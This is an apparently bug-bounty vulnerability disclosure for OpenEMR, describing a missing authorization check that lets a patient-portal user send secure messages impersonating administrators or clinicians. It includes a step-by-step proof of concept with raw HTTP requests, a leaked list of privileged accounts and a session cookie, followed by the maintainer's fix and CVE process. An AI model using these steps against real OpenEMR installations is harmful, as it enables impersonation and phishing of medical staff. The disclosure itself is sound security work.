Missing Authorization Check Allows Impersonated Secure Messages in openemr/openemr


Reported on

Feb 27th 2023


Due to the lack of an authorization check when sending secure messages, an attacker with access to a low level patient account in the portal can impersonate other users when sending secure messages. This would allow a malicious actor to impersonate high-level users (administrators/doctors) when sending secure messages and can lead to legitimate looking social engineering and phishing attacks.

Proof of Concept

Step 1. Login to the patient portal using a low-level patient account
Step 2. Using a tool such as BurpSuite, capture the following request and view it's response. The response will contain important account information about privileged users and their accounts.

# Request
POST /openemr/portal/messaging/secure_chat.php?action=authusers HTTP/1.1
Host: demo.openemr.io
Te: trailers
Connection: close

HTTP/1.1 200 OK
Server: nginx/1.21.1
Date: Mon, 27 Feb 2023 02:47:10 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 367
Connection: close
X-Powered-By: PHP/8.0.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache

[{"recip_id":"admin","dash":"1","username":"Billy Smith"},{"recip_id":"accountant","dash":"0","username":"Ernie Stent"},{"recip_id":"clinician","dash":"1","username":"Fred Stone"},{"recip_id":"physician","dash":"1","username":"Donna Lee"},{"recip_id":"receptionist","dash":"0","username":"Barbara Wallace"},{"recip_id":"zhportal","dash":"0","username":"Fred Jarvis"}]

Step 3. Now go to the 'My Messages' section and craft a test message. Send this test message and capture the request using Burp.
Step 4. Replace the recipient_id, recipient_name, sender_id, sender_name parameters with information acquired from step 2. For example, send a message from the admin account to another high privileged user.

POST /openemr/portal/messaging/handle_note.php HTTP/1.1
Host: demo.openemr.io
Cookie: username=Phil%20Belford; PortalOpenEMR=hsQebSDBqentL5pi-I6T5MVvqPNCGTX4d7pODNoKqhoy5-K%2C
Content-Length: 255
Origin: https://demo.openemr.io
Referer: https://demo.openemr.io/openemr/portal/messaging/messages.php
Connection: close


Step 5. Release this altered request and the victim will receive your impersonated secure message. High-level users will receive this message in the "Secure Messages" section even if they do not usually have access to this feature. (A portal icon will appear in the top right corner of their screen)


An attacker could use this vulnerability to impersonate administrators and high-level users to conduct advanced phishing and social engineering attacks within the application.

We are processing your report and will contact the openemr team within 24 hours. 7 months ago
We have contacted a member of the openemr team and are waiting to hear back 7 months ago
openemr/openemr maintainer has acknowledged this report 6 months ago
Brady Miller validated this vulnerability 6 months ago

This is fixed is in master branch at https://github.com/openemr/openemr/commit/3656bc88288957d68ba040cad2e5f9dbd1b607b1

@drew-sec, I am unable to mark this as fixed, since that requires hard-setting a publish date, which I am unable to safely predict. We plan to release OpenEMR 7.0.1 in about 3-4 weeks, which will include this fix. At that time (after release OpenEMR 7.0.1), we will then mark this issue as fixed (and publish at that time with a cve).

thanks for the report @drew-sec !

Andrew Steinberg has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
5 months ago


Now that 7.0.1 has been released, can we please have the CVE filed for this vulnerability?

4 months ago


Hey @bradymiller, could I please get CVEs filed for the three vulnerabilities that I disclosed for OpenEMR? Thanks!

4 months ago


@admin, could I please have CVEs filed for the three vulnerabilities I reported for this project?

Ben Harvie
4 months ago


Hi Andrew, the maintainer can assign a CVE once it is marked as fixed & published.

Brady Miller marked this as fixed in 7.0.1 with commit 3656bc 4 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
Brady Miller published this vulnerability 4 months ago
to join this conversation